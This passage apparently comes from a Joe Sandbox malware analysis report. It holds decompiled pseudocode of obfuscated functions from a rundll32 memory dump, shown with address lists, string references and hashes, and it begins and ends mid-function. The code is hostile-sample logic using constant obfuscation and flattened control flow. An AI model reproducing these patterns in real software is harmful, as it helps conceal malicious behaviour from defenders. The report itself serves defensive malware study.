					E007B8519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
					_t374 = 0xf828486;
					_t347 = 0xfb52c5;
					goto L30;
				}
			}

0x007a81bd
0x007a81c7
0x007a81cf
0x007a81d4
0x007a81dc
0x007a81e4
0x007a81f3
0x007a81f8
0x007a81fe
0x007a8206
0x007a820e
0x007a8219
0x007a8224
0x007a822f
0x007a8237
0x007a823c
0x007a8241
0x007a8246
0x007a824e
0x007a825b
0x007a825c
0x007a8264
0x007a8268
0x007a8270
0x007a8278
0x007a8280
0x007a828e
0x007a8292
0x007a829a
0x007a82a2
0x007a82aa
0x007a82af
0x007a82b7
0x007a82c2
0x007a82ca
0x007a82d5
0x007a82dd
0x007a82e2
0x007a82ea
0x007a82f2
0x007a82fa
0x007a8307
0x007a830b
0x007a8313
0x007a831b
0x007a8323
0x007a832b
0x007a8333
0x007a8338
0x007a8340
0x007a8348
0x007a8355
0x007a8359
0x007a8361
0x007a8369
0x007a8371
0x007a8376
0x007a837e
0x007a8386
0x007a838b
0x007a8393
0x007a839b
0x007a83a8
0x007a83ac
0x007a83b4
0x007a83bc
0x007a83c6
0x007a83ce
0x007a83d6
0x007a83de
0x007a83e6
0x007a83eb
0x007a83f3
0x007a83fb
0x007a8403
0x007a8412
0x007a8415
0x007a8419
0x007a8421
0x007a842c
0x007a8437
0x007a8442
0x007a844a
0x007a844f
0x007a8457
0x007a845f
0x007a8467
0x007a846f
0x007a847f
0x007a8483
0x007a848b
0x007a8493
0x007a849b
0x007a84a0
0x007a84a8
0x007a84bb
0x007a84be
0x007a84c5
0x007a84d0
0x007a84e0
0x007a84e4
0x007a84ec
0x007a84f4
0x007a84fc
0x007a8504
0x007a8510
0x007a8515
0x007a851b
0x007a8520
0x007a8528
0x007a8533
0x007a853e
0x007a8549
0x007a8555
0x007a8558
0x007a855c
0x007a8561
0x007a8566
0x007a856e
0x007a8576
0x007a8580
0x007a8584
0x007a858c
0x007a8594
0x007a8599
0x007a85a1
0x007a85a6
0x007a85ae
0x007a85b6
0x007a85c0
0x007a85c4
0x007a85c8
0x007a85cc
0x007a85d0
0x007a85d4
0x007a85dc
0x007a85e4
0x007a85ec
0x007a85f4
0x007a8607
0x007a860e
0x007a8619
0x007a8621
0x007a8626
0x007a8633
0x007a8637
0x007a863f
0x007a864a
0x007a8655
0x007a8660
0x007a866d
0x007a8671
0x007a8679
0x007a8679
0x007a8679
0x00000000
0x007a867e
0x007a868c
0x007a8806
0x007a880b
0x007a880e
0x007a8810
0x007a8854
0x007a8812
0x007a8812
0x007a8814
0x007a8814
0x007a8818
0x00000000
0x00000000
0x007a881a
0x007a8832
0x007a8837
0x007a883a
0x007a883c
0x007a884a
0x007a884b
0x00000000
0x00000000
0x00000000
0x007a8864
0x007a8864
0x00000000
0x007a883e
0x007a883e
0x007a8840
0x007a8842
0x007a885d
0x007a8844
0x007a8844
0x007a8814
0x007a8818
0x00000000
0x00000000
0x007a8818
0x00000000
0x007a8842
0x007a8814
0x007a8868
0x007a8868
0x007a886a
0x007a888d
0x007a8892
0x00000000
0x007a886c
0x007a8870
0x007a887d
0x007a8883
0x00000000
0x007a8883
0x00000000
0x007a8692
0x007a8698
0x007a87b9
0x007a87be
0x007a87c0
0x007a87c3
0x007a87c6
0x007a87cc
0x007a8679
0x007a8679
0x007a8679
0x00000000
0x007a8679
0x007a8679
0x007a869e
0x007a86a4
0x007a874a
0x007a8765
0x007a876a
0x007a876c
0x007a8771
0x007a8776
0x007a8679
0x007a8679
0x007a8679
0x00000000
0x007a8679
0x007a86aa
0x007a86b0
0x007a86ff
0x007a870e
0x007a870f
0x007a8710
0x007a871a
0x007a871c
0x007a8722
0x007a8729
0x00000000
0x007a86b2
0x007a86b8
0x007a86f4
0x00000000
0x007a86ba
0x007a86c0
0x007a88b2
0x007a88b2
0x007a88b8
0x00000000
0x00000000
0x007a88be
0x007a86c6
0x007a86dd
0x007a86e2
0x007a86c0
0x007a86b8
0x007a86b0
0x007a86a4
0x007a8698
0x007a86f1
0x00000000
0x007a86f1
0x007a88a2
0x007a88a8
0x007a88ad
0x00000000
0x007a88ad

Strings

/&X, xrefs: 007A8457
q_, xrefs: 007A820E
N'`, xrefs: 007A81DC
S,I, xrefs: 007A848B
Q, xrefs: 007A84EC
Lz, xrefs: 007A81FE
Ze, xrefs: 007A864A

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
API String ID: 0-1837206032
Opcode ID: 7160dd545e6acd7a0b2f54cff820614f1f963067d41b8fa969176b7cb96e3272
Instruction ID: fc2295d3412f15fc447c4799eedd03865572bfe93fdd40ccb96cd207a9011fa8
Opcode Fuzzy Hash: 7160dd545e6acd7a0b2f54cff820614f1f963067d41b8fa969176b7cb96e3272
Instruction Fuzzy Hash: 0A0221711083809FD3A8CF25C489A5BBBE1FBC5758F508A1DF5DA86260DBB89949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 007BCB5B Relevance: 9.1, Strings: 7, Instructions: 335
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E007BCB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v520;
				char _v1040;
				char _v1560;
				intOrPtr _v1564;
				intOrPtr _v1568;
				intOrPtr _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				void* _t341;
				void* _t370;
				void* _t379;
				intOrPtr _t382;
				intOrPtr _t385;
				void* _t396;
				intOrPtr _t399;
				intOrPtr _t436;
				signed int _t437;
				signed int _t438;
				signed int _t439;
				signed int _t440;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int* _t449;

				_push(_a12);
				_t436 = 0;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E007B20B9(_t341);
				_v1572 = 0xe82680;
				_t449 =  &(( &_v1708)[5]);
				_v1568 = 0;
				_v1564 = 0;
				_t396 = 0x9368da1;
				_v1584 = 0x42403b;
				_v1584 = _v1584 + 0xffffd771;
				_v1584 = _v1584 ^ 0x00421785;
				_v1692 = 0xc00255;
				_t437 = 0x16;
				_v1692 = _v1692 / _t437;
				_v1692 = _v1692 + 0xffff6b87;
				_v1692 = _v1692 + 0xffff176e;
				_v1692 = _v1692 ^ 0x0004c90f;
				_v1668 = 0x5abcaa;
				_v1668 = _v1668 | 0xa6adf3e3;
				_v1668 = _v1668 + 0xffff713c;
				_v1668 = _v1668 << 6;
				_v1668 = _v1668 ^ 0xbfd49dc8;
				_v1700 = 0xb35187;
				_v1700 = _v1700 | 0x50a44dff;
				_v1700 = _v1700 + 0xfffff2e6;
				_v1700 = _v1700 >> 8;
				_v1700 = _v1700 ^ 0x0051b9c1;
				_v1644 = 0x4d7cc3;
				_v1644 = _v1644 + 0xffffa786;
				_v1644 = _v1644 | 0x8b8a715e;
				_v1644 = _v1644 ^ 0x6234f021;
				_v1644 = _v1644 ^ 0xe9f998a6;
				_v1624 = 0x204c5b;
				_v1624 = _v1624 + 0xffffa901;
				_v1624 = _v1624 + 0x49e1;
				_v1624 = _v1624 ^ 0x002fe6aa;
				_v1632 = 0xbb0a9b;
				_v1632 = _v1632 * 0x52;
				_v1632 = _v1632 | 0x83893080;
				_v1632 = _v1632 ^ 0xbbe905c0;
				_v1620 = 0x19fb1a;
				_v1620 = _v1620 | 0x985eae3d;
				_v1620 = _v1620 + 0xf613;
				_v1620 = _v1620 ^ 0x9864c971;
				_v1656 = 0x35ecb4;
				_v1656 = _v1656 * 0x29;
				_v1656 = _v1656 + 0x1081;
				_v1656 = _v1656 + 0xffffd324;
				_v1656 = _v1656 ^ 0x08a8fe56;
				_v1580 = 0xc60f6f;
				_v1580 = _v1580 + 0xffffd3e6;
				_v1580 = _v1580 ^ 0x00c233ea;
				_v1664 = 0x2df5c;
				_v1664 = _v1664 << 8;
				_v1664 = _v1664 * 0x4c;
				_v1664 = _v1664 + 0xffffaed7;
				_v1664 = _v1664 ^ 0xda40187b;
				_v1672 = 0x38409b;
				_v1672 = _v1672 * 0x33;
				_v1672 = _v1672 | 0x7fcdffbb;
				_v1672 = _v1672 ^ 0x7ff87770;
				_v1680 = 0xe751cb;
				_v1680 = _v1680 ^ 0x8590ed7d;
				_v1680 = _v1680 + 0xffffebc9;
				_v1680 = _v1680 * 0x5e;
				_v1680 = _v1680 ^ 0x01e2719c;
				_v1688 = 0x15e1cd;
				_v1688 = _v1688 + 0xfe19;
				_v1688 = _v1688 + 0xffffc88c;
				_v1688 = _v1688 << 7;
				_v1688 = _v1688 ^ 0x0b5f3deb;
				_v1696 = 0x33a377;
				_v1696 = _v1696 << 0xa;
				_v1696 = _v1696 ^ 0xfb2d04b5;
				_v1696 = _v1696 | 0xd2f07883;
				_v1696 = _v1696 ^ 0xf7fa7ce3;
				_v1640 = 0x94004d;
				_v1640 = _v1640 >> 0xa;
				_t438 = 0x67;
				_v1640 = _v1640 * 0x3d;
				_v1640 = _v1640 >> 7;
				_v1640 = _v1640 ^ 0x00039ca1;
				_v1648 = 0xfcfef3;
				_v1648 = _v1648 * 0x18;
				_v1648 = _v1648 + 0x9c71;
				_v1648 = _v1648 | 0xf5d6202a;
				_v1648 = _v1648 ^ 0xf7f57601;
				_v1596 = 0xc58f80;
				_v1596 = _v1596 + 0xffff2f17;
				_v1596 = _v1596 ^ 0x00ce700d;
				_v1684 = 0xee980b;
				_v1684 = _v1684 >> 6;
				_v1684 = _v1684 / _t438;
				_v1684 = _v1684 + 0xffff2a3f;
				_v1684 = _v1684 ^ 0xfff3655c;
				_v1652 = 0x45a4a9;
				_v1652 = _v1652 >> 0xe;
				_t439 = 0x6e;
				_v1652 = _v1652 * 0x51;
				_v1652 = _v1652 + 0x9be3;
				_v1652 = _v1652 ^ 0x0004d4d8;
				_v1708 = 0x222243;
				_t176 =  &_v1708; // 0x222243
				_v1708 =  *_t176 / _t439;
				_v1708 = _v1708 << 9;
				_v1708 = _v1708 + 0xffff4a12;
				_v1708 = _v1708 ^ 0x009b5339;
				_v1612 = 0x464ea3;
				_v1612 = _v1612 + 0x89cc;
				_v1612 = _v1612 >> 2;
				_v1612 = _v1612 ^ 0x00167067;
				_v1588 = 0xd74d9e;
				_v1588 = _v1588 | 0x529da741;
				_v1588 = _v1588 ^ 0x52d09c78;
				_v1628 = 0x60b5eb;
				_v1628 = _v1628 >> 9;
				_t440 = 0x19;
				_v1628 = _v1628 / _t440;
				_v1628 = _v1628 ^ 0x000ff1bc;
				_v1676 = 0xfb7b01;
				_v1676 = _v1676 << 4;
				_v1676 = _v1676 + 0xffffc28e;
				_t441 = 0x1b;
				_v1676 = _v1676 / _t441;
				_v1676 = _v1676 ^ 0x0096cb21;
				_v1660 = 0xed67c1;
				_v1660 = _v1660 << 0xa;
				_v1660 = _v1660 | 0xef7d69c8;
				_v1660 = _v1660 << 2;
				_v1660 = _v1660 ^ 0xfff42fe1;
				_v1604 = 0x46c7e8;
				_v1604 = _v1604 << 0xf;
				_v1604 = _v1604 ^ 0x63fe3710;
				_v1636 = 0x7a345b;
				_v1636 = _v1636 + 0xd479;
				_v1636 = _v1636 + 0x8c7f;
				_v1636 = _v1636 ^ 0x00708a00;
				_v1704 = 0x80508e;
				_v1704 = _v1704 ^ 0xf958081f;
				_t442 = 0x4b;
				_v1704 = _v1704 / _t442;
				_t443 = 0x34;
				_v1704 = _v1704 * 0x44;
				_v1704 = _v1704 ^ 0xe2885afb;
				_v1576 = 0x325f4f;
				_t259 =  &_v1576; // 0x325f4f
				_v1576 =  *_t259 * 0x7a;
				_v1576 = _v1576 ^ 0x180920ed;
				_v1592 = 0xd554f9;
				_v1592 = _v1592 * 0x4e;
				_v1592 = _v1592 ^ 0x40f8e8dd;
				_v1608 = 0x6be570;
				_v1608 = _v1608 + 0x3d4f;
				_v1608 = _v1608 ^ 0x4461575c;
				_v1608 = _v1608 ^ 0x440eeedf;
				_v1616 = 0x4acfbf;
				_v1616 = _v1616 / _t443;
				_t444 = 0xe;
				_v1616 = _v1616 / _t444;
				_v1616 = _v1616 ^ 0x000fdd65;
				_v1600 = 0x55de88;
				_v1600 = _v1600 << 2;
				_v1600 = _v1600 ^ 0x01580110;
				do {
					while(_t396 != 0x196a97b) {
						if(_t396 == 0x2ca432c) {
							_push(_v1652);
							_push(_v1684);
							_t379 = E007BDCF7(_v1596, 0x7a10f0, __eflags);
							E007B176B( &_v1560, __eflags);
							_t382 =  *0x7c3e10; // 0x0
							_t385 =  *0x7c3e10; // 0x0
							E007BE32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
							E007AA8B0(_v1704, _t379, _v1576);
							_t449 =  &(_t449[0xf]);
							_t396 = 0x9d0e956;
							continue;
						} else {
							if(_t396 == 0x9368da1) {
								_push(_v1644);
								_push(_v1584);
								_push(_v1700);
								_push( &_v1040);
								E007B46BB(_v1692, _v1668);
								_t449 = _t449 - 0xc + 0x1c;
								_t396 = 0x196a97b;
								continue;
							} else {
								_t456 = _t396 - 0x9d0e956;
								if(_t396 != 0x9d0e956) {
									goto L10;
								} else {
									_push(_v1600);
									_push(_t436);
									_push(_t396);
									_push(_t436);
									_push(_t436);
									_push(_v1616);
									_push( &_v520);
									E007AAB87(_v1592, _v1608, _t456);
									_t436 =  !=  ? 1 : _t436;
								}
							}
						}
						L6:
						return _t436;
					}
					_push(_v1620);
					_push(_v1632);
					_t370 = E007BDCF7(_v1624, 0x7a1020, __eflags);
					E007B176B( &_v1560, __eflags);
					_t399 =  *0x7c3e10; // 0x0
					_t336 = _t399 + 0x1c; // 0x1c
					_t337 = _t399 + 0x23c; // 0x23c
					E007B1652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
					E007AA8B0(_v1640, _t370, _v1648);
					_t449 =  &(_t449[0xf]);
					_t396 = 0x9d0e956;
					L10:
					__eflags = _t396 - 0xce3b296;
				} while (__eflags != 0);
				goto L6;
			}

0x007bcb65
0x007bcb6c
0x007bcb6e
0x007bcb75
0x007bcb7c
0x007bcb7d
0x007bcb7e
0x007bcb83
0x007bcb8e
0x007bcb91
0x007bcb9a
0x007bcba1
0x007bcba6
0x007bcbb1
0x007bcbbc
0x007bcbc7
0x007bcbd5
0x007bcbd8
0x007bcbdc
0x007bcbe4
0x007bcbec
0x007bcbf4
0x007bcbfc
0x007bcc04
0x007bcc0c
0x007bcc11
0x007bcc19
0x007bcc21
0x007bcc29
0x007bcc31
0x007bcc36
0x007bcc3e
0x007bcc46
0x007bcc4e
0x007bcc56
0x007bcc5e
0x007bcc66
0x007bcc6e
0x007bcc76
0x007bcc7e
0x007bcc86
0x007bcc93
0x007bcc97
0x007bcc9f
0x007bcca7
0x007bccaf
0x007bccb7
0x007bccbf
0x007bccc7
0x007bccd4
0x007bccd8
0x007bcce0
0x007bcce8
0x007bccf0
0x007bccfb
0x007bcd06
0x007bcd11
0x007bcd19
0x007bcd23
0x007bcd27
0x007bcd2f
0x007bcd37
0x007bcd44
0x007bcd48
0x007bcd50
0x007bcd58
0x007bcd60
0x007bcd68
0x007bcd75
0x007bcd7b
0x007bcd83
0x007bcd8b
0x007bcd93
0x007bcd9b
0x007bcda0
0x007bcda8
0x007bcdb0
0x007bcdb5
0x007bcdbd
0x007bcdc5
0x007bcdcd
0x007bcdd5
0x007bcde1
0x007bcde4
0x007bcde8
0x007bcded
0x007bcdf5
0x007bce02
0x007bce06
0x007bce0e
0x007bce16
0x007bce1e
0x007bce29
0x007bce34
0x007bce3f
0x007bce47
0x007bce54
0x007bce58
0x007bce60
0x007bce68
0x007bce70
0x007bce7a
0x007bce7d
0x007bce81
0x007bce89
0x007bce91
0x007bce99
0x007bcea1
0x007bcea5
0x007bceaa
0x007bceb2
0x007bceba
0x007bcec2
0x007bceca
0x007bcecf
0x007bced7
0x007bcee2
0x007bceed
0x007bcef8
0x007bcf00
0x007bcf09
0x007bcf0e
0x007bcf14
0x007bcf1c
0x007bcf24
0x007bcf29
0x007bcf35
0x007bcf38
0x007bcf3c
0x007bcf44
0x007bcf4c
0x007bcf51
0x007bcf5b
0x007bcf65
0x007bcf72
0x007bcf7a
0x007bcf7f
0x007bcf87
0x007bcf8f
0x007bcf97
0x007bcf9f
0x007bcfa7
0x007bcfaf
0x007bcfbd
0x007bcfc2
0x007bcfcd
0x007bcfd0
0x007bcfd4
0x007bcfdc
0x007bcfe7
0x007bcfef
0x007bcff6
0x007bd001
0x007bd014
0x007bd01b
0x007bd026
0x007bd02e
0x007bd036
0x007bd03e
0x007bd046
0x007bd056
0x007bd05e
0x007bd061
0x007bd065
0x007bd06d
0x007bd075
0x007bd07a
0x007bd082
0x007bd082
0x007bd090
0x007bd119
0x007bd122
0x007bd12d
0x007bd13b
0x007bd149
0x007bd16e
0x007bd19b
0x007bd1ad
0x007bd1b2
0x007bd1b5
0x00000000
0x007bd096
0x007bd09c
0x007bd0e8
0x007bd0f3
0x007bd0fa
0x007bd109
0x007bd10a
0x007bd10f
0x007bd112
0x00000000
0x007bd09e
0x007bd09e
0x007bd0a0
0x00000000
0x007bd0a6
0x007bd0a6
0x007bd0b1
0x007bd0b2
0x007bd0b3
0x007bd0b4
0x007bd0b5
0x007bd0ca
0x007bd0cb
0x007bd0d8
0x007bd0d8
0x007bd0a0
0x007bd09c
0x007bd0db
0x007bd0e7
0x007bd0e7
0x007bd1bc
0x007bd1c5
0x007bd1cd
0x007bd1db
0x007bd212
0x007bd21f
0x007bd223
0x007bd22e
0x007bd243
0x007bd248
0x007bd24b
0x007bd24d
0x007bd24d
0x007bd24d
0x00000000

Strings

[L , xrefs: 007BCC66
O_2, xrefs: 007BCFE7
;@B, xrefs: 007BCBA6
I, xrefs: 007BCC76
\WaD, xrefs: 007BD036
C"", xrefs: 007BCE99
M, xrefs: 007BCDCD

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: ;@B$C""$M$O_2$[L $\WaD$I
API String ID: 1514166925-27743949
Opcode ID: 56e8f35f5d010247a317cfdaade008a04eb36f5559bfb1de6c15b61071a1a13b
Instruction ID: a3ccc779f278f21d4d31624a7cb08471f7e8baa6d0c39971cd2606d27f74f38d
Opcode Fuzzy Hash: 56e8f35f5d010247a317cfdaade008a04eb36f5559bfb1de6c15b61071a1a13b
Instruction Fuzzy Hash: 7C021DB15083819FD3A4CF25C98AA8BFBE1FBC4718F50891DF1D986260D7B5894ACF52

Uniqueness

Uniqueness Score: -1.00%

Function 007AE5CF Relevance: 9.0, Strings: 7, Instructions: 204
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E007AE5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t170;
				void* _t181;
				void* _t184;
				void* _t189;
				void* _t192;
				void* _t195;
				void* _t197;
				void* _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int* _t226;

				_push(_a8);
				_t219 = _a4;
				_t195 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E007B20B9(_t170);
				_v56 = 0xa4c651;
				_t226 =  &(( &_v116)[4]);
				_v56 = _v56 ^ 0x6a6d8bac;
				_v56 = _v56 ^ 0x6ac6bd64;
				_t220 = 0;
				_v60 = 0xbac055;
				_t197 = 0xf39239f;
				_v60 = _v60 << 0xd;
				_v60 = _v60 ^ 0x580542e6;
				_v108 = 0xd580f5;
				_v108 = _v108 ^ 0x97cdda0d;
				_v108 = _v108 + 0x37dd;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 ^ 0x00021113;
				_v52 = 0xf28435;
				_v52 = _v52 | 0x057a1a90;
				_v52 = _v52 ^ 0x05fdc129;
				_v80 = 0x5c8bc8;
				_t221 = 0x27;
				_v80 = _v80 / _t221;
				_t222 = 0x1b;
				_v80 = _v80 * 9;
				_v80 = _v80 ^ 0x0013f028;
				_v96 = 0x281d9a;
				_v96 = _v96 + 0xffff8f77;
				_v96 = _v96 + 0x4719;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xfa152b1c;
				_v112 = 0x7415d8;
				_v112 = _v112 >> 0xf;
				_v112 = _v112 + 0xfffff76c;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000d779a;
				_v88 = 0xb68707;
				_v88 = _v88 ^ 0x45e0ecf4;
				_v88 = _v88 + 0xffff71c0;
				_v88 = _v88 ^ 0x455519c2;
				_v116 = 0xceabf6;
				_v116 = _v116 + 0x1225;
				_v116 = _v116 / _t222;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x0006e3bb;
				_v84 = 0xd525a4;
				_v84 = _v84 + 0xffff1243;
				_v84 = _v84 + 0x1c30;
				_v84 = _v84 ^ 0x00df7efc;
				_v100 = 0xf29ecf;
				_v100 = _v100 << 0xc;
				_v100 = _v100 + 0xffff4e95;
				_v100 = _v100 ^ 0x70d6065d;
				_v100 = _v100 ^ 0x593d89f0;
				_v104 = 0x2206c6;
				_v104 = _v104 | 0x38687435;
				_v104 = _v104 ^ 0xadcf411b;
				_v104 = _v104 ^ 0x9549ac77;
				_v104 = _v104 ^ 0x00e3f730;
				_v92 = 0xd38a43;
				_v92 = _v92 >> 3;
				_v92 = _v92 + 0x6fd1;
				_v92 = _v92 ^ 0x0012c73c;
				_v64 = 0x625266;
				_v64 = _v64 + 0x2436;
				_v64 = _v64 ^ 0x006987c3;
				_v68 = 0xe296bd;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x52d9a139;
				_v72 = 0x54a2fd;
				_v72 = _v72 << 0xd;
				_v72 = _v72 >> 0xa;
				_v72 = _v72 ^ 0x002b3e4c;
				_v76 = 0x32cdcd;
				_v76 = _v76 << 0xb;
				_t223 = 0x32;
				_v76 = _v76 / _t223;
				_v76 = _v76 ^ 0x0302c408;
				_v48 = 0x2d2164;
				_v48 = _v48 + 0xfffff0e0;
				_v48 = _v48 ^ 0x0021ab5a;
				do {
					while(_t197 != 0x2168849) {
						if(_t197 == 0x29fa3de) {
							_t184 = E007A2A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
							_t226 =  &(_t226[3]);
							__eflags = _t184;
							if(__eflags != 0) {
								_t197 = 0x74ac459;
								continue;
							}
						} else {
							if(_t197 == 0x545de14) {
								E007A3DBC( &_v44, _t195, _v56, _v60, _v108);
								_t226 =  &(_t226[3]);
								_t197 = 0x2168849;
								continue;
							} else {
								if(_t197 == 0x6ab10c5) {
									_t189 = E007A2A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
									_t226 =  &(_t226[3]);
									__eflags = _t189;
									if(__eflags != 0) {
										_t197 = 0x29fa3de;
										continue;
									}
								} else {
									if(_t197 == 0x74ac459) {
										_t192 = E007A2A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
										_t226 =  &(_t226[3]);
										__eflags = _t192;
										if(__eflags != 0) {
											_t197 = 0x9dbfb8a;
											continue;
										}
									} else {
										if(_t197 == 0x9dbfb8a) {
											__eflags = E007BD97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
											_t220 =  !=  ? 1 : _t220;
										} else {
											if(_t197 != 0xf39239f) {
												goto L19;
											} else {
												_t197 = 0x545de14;
												continue;
											}
										}
									}
								}
							}
						}
						L22:
						return _t220;
					}
					_t181 = E007A2A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
					_t226 =  &(_t226[3]);
					__eflags = _t181;
					if(__eflags == 0) {
						_t197 = 0x90a774d;
						goto L19;
					} else {
						_t197 = 0x6ab10c5;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t197 - 0x90a774d;
				} while (__eflags != 0);
				goto L22;
			}

0x007ae5d6
0x007ae5dd
0x007ae5e4
0x007ae5e6
0x007ae5e7
0x007ae5e8
0x007ae5e9
0x007ae5ee
0x007ae5f6
0x007ae5f9
0x007ae603
0x007ae60b
0x007ae60d
0x007ae615
0x007ae61a
0x007ae61f
0x007ae627
0x007ae62f
0x007ae637
0x007ae63f
0x007ae644
0x007ae64c
0x007ae654
0x007ae65c
0x007ae664
0x007ae672
0x007ae677
0x007ae682
0x007ae683
0x007ae687
0x007ae68f
0x007ae697
0x007ae69f
0x007ae6a7
0x007ae6ac
0x007ae6b4
0x007ae6bc
0x007ae6c1
0x007ae6c9
0x007ae6ce
0x007ae6d6
0x007ae6de
0x007ae6e6
0x007ae6ee
0x007ae6f6
0x007ae6fe
0x007ae70c
0x007ae710
0x007ae715
0x007ae71d
0x007ae725
0x007ae72d
0x007ae735
0x007ae73d
0x007ae745
0x007ae74a
0x007ae752
0x007ae75a
0x007ae762
0x007ae76a
0x007ae772
0x007ae77a
0x007ae782
0x007ae78a
0x007ae792
0x007ae797
0x007ae79f
0x007ae7a7
0x007ae7af
0x007ae7b9
0x007ae7c1
0x007ae7c9
0x007ae7ce
0x007ae7d6
0x007ae7de
0x007ae7e3
0x007ae7e8
0x007ae7f0
0x007ae7f8
0x007ae803
0x007ae80b
0x007ae80f
0x007ae817
0x007ae81f
0x007ae827
0x007ae82f
0x007ae82f
0x007ae83d
0x007ae90f
0x007ae914
0x007ae917
0x007ae919
0x007ae91b
0x00000000
0x007ae91b
0x007ae843
0x007ae849
0x007ae8e8
0x007ae8ed
0x007ae8f0
0x00000000
0x007ae84f
0x007ae855
0x007ae8bf
0x007ae8c4
0x007ae8c7
0x007ae8c9
0x007ae8cf
0x00000000
0x007ae8cf
0x007ae857
0x007ae85d
0x007ae893
0x007ae898
0x007ae89b
0x007ae89d
0x007ae8a3
0x00000000
0x007ae8a3
0x007ae85f
0x007ae865
0x007ae982
0x007ae984
0x007ae86b
0x007ae871
0x00000000
0x007ae877
0x007ae877
0x00000000
0x007ae877
0x007ae871
0x007ae865
0x007ae85d
0x007ae855
0x007ae849
0x007ae988
0x007ae990
0x007ae990
0x007ae93a
0x007ae93f
0x007ae942
0x007ae944
0x007ae950
0x00000000
0x007ae946
0x007ae946
0x00000000
0x007ae946
0x00000000
0x007ae955
0x007ae955
0x007ae955
0x00000000

Strings

5th8, xrefs: 007AE76A
Mw, xrefs: 007AE950
d!-, xrefs: 007AE817
6$, xrefs: 007AE7AF
L>+, xrefs: 007AE7E8
fRb, xrefs: 007AE7A7
Mw, xrefs: 007AE955

Memory Dump Source

Source File: 00000009.00000002.497023590.00000000007A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000009.00000002.497015544.00000000007A0000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.497057228.00000000007C3000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a0000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 5th8$6$$L>+$Mw$Mw$d!-$fRb
API String ID: 0-2045295228
Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
Instruction ID: c1a81e956f7460baf2e152f9a09496035a3beec6555ac22468dddb53a5891b78
Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
Instruction Fuzzy Hash: 8B9174B2108341DBC794CF60C88941BFBE5BBD5758F005A1DF59292220D7B9DA19CF83

Uniqueness

Uniqueness Score: -1.00%

Function 007AE2CC Relevance: 8.9, Strings: 7, Instructions: 178
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E007AE2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				intOrPtr _v576;
				char _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				void* __ecx;
				void* _t136;
				void* _t151;
